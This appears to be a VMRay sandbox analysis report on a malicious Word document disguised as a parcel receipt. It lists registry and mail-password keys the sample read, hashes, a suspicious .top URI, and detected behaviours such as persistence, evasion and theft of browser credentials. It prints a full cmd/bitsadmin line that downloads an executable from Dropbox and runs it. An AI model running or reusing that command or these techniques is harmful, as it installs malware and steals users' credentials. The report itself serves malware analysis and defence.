Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER IMAP Server 
WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 User POP3 User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER IMAP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER SMTP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER IMAP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER SMTP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER IMAP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER IMAP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER SMTP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER 
POP3 Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER IMAP Password WinRegistryKey Software\Mozilla\Firefox HKEY_CURRENT_USER PathToExe WinRegistryKey Software\Mozilla\Firefox HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0 HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} HKEY_LOCAL_MACHINE DisplayName 
DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} HKEY_LOCAL_MACHINE DisplayName DisplayName WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna URI aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ Contains URI 
Analyzed Sample #20911
Malware Artifacts 20911
Sample-ID: #20911
Job-ID: #16639
This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system
0 VTI Score based on VTI Database Version 2.6

Metadata of Sample File #20911
Submission-ID: #21826
C:\Users\aETAdzjz\Desktop\receipt-parcel-UK980-456.doc doc
MD5 1dfa6c28e296b4196f92c8b97e050754
SHA1 b8c701c3a0059820ee60111aa3cc6add2dbc33d0
SHA256 880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772
Opened_By

Metadata of Analysis for Job-ID #16639
Timeout False x86 64-bit win7_64_sp1-mso2016 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 614.142
This is a property collection for additional information of VMRay analysis

VMRay Analyzer
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe"". Create process
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\waitfor.exe". Create process
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\bitsadmin.exe". Create process
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe". Create process
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create nameless mutex. Create system object
Information Stealing VTI rule match with VTI rule score 2/5 vmray_read_windows_install_date Read the Windows installation date from registry. Read system data
Information Stealing VTI rule match with VTI rule score 3/5 vmray_read_windows_license_by_registry Readout Windows license key. Read system data
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "9B4D68961731FE3C22DA08B640799EB6". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Sandboxie_SingleInstanceMutex_Control". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Frz_State". Create system object
Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_wine_by_getprocaddress Possibly trying to detect "wine" by calling GetProcAddress() on "wine_get_unix_file_name". Try to detect application sandbox
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"". Create process
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "C2E6ECE9938A43206F172A85684E36DB". Create system object
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat"". Create process
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\SysWOW64\svchost.exe -k netsvcs". Create process
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "CEE48AFA231AB21CA6E2437DB844BAD7". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "E58EFF540968A436E982FCFA1C0445A2". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "B3F6E53F120A5BE5825B9C06159BB3F4". Create system object
Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_registry Add ""C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"" to windows startup via registry. Install system startup script or application
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "ABC6B5B774FF9FD7F54EC277098C64EE". Create system object
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 1776 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Baywkivyl". Write large data into the registry
Anti Analysis VTI rule match with VTI rule score 3/5 vmray_delay_execution_by_sleep One thread sleeps more than 5 minutes. Delay execution
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "1F4C22565107A34AD73CB0F585F8F77C". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "20BC29E135FB9B01285187E3B5593CC8". Create system object
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 1776 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Omegovna". Write large data into the registry
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "4786CF0F1E6E9E20640CE4A22DFFC997". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "35D65C8FBCA06952705002450D6712FC". Create system object
Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_av_by_wmi_query Check for antivirus software via WMI query: "select * from antivirusproduct". Try to detect antivirus software
Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_fw_by_wmi_query Check for firewall via WMI query: "select * from firewallproduct". Try to detect firewall
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "A354992B05F4DA0EB1B4AB788E3CE988". Create system object
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe"". Create process
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "61AB4C4AE08220DC5911D67B8EFCF107". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "F063546A5853AF5508DB5A15751DB34A". Create system object
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 88160 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 200848 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 295088 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat"". Create process
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "A63A6CDA308CF3B4F10C6B82D6B9EA5B". Create system object
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "629BC138D148FEC80DAF76D454EF252E". Create system object
OS VTI rule match with VTI rule score 1/5 vmray_use_encryption_api Use above average number of encryption APIs. Use encryption API
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "D3F6CAB61E96B029AD170EEF2C2F89C2". Create system object
Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_credentials Read saved credentials for "Mozilla Firefox". Read data related to saved browser credentials
Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_credentials Read saved credentials for "Google Chrome". Read data related to saved browser credentials
Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_cookies Read Cookies for "Microsoft Internet Explorer". Read data related to browser cookies
Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_cookies Read Cookies for "Mozilla Firefox". Read data related to browser cookies
Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_cookies Read Cookies for "Google Chrome". Read data related to browser cookies
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 516320 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 792144 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 803104 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry
Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 822944 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry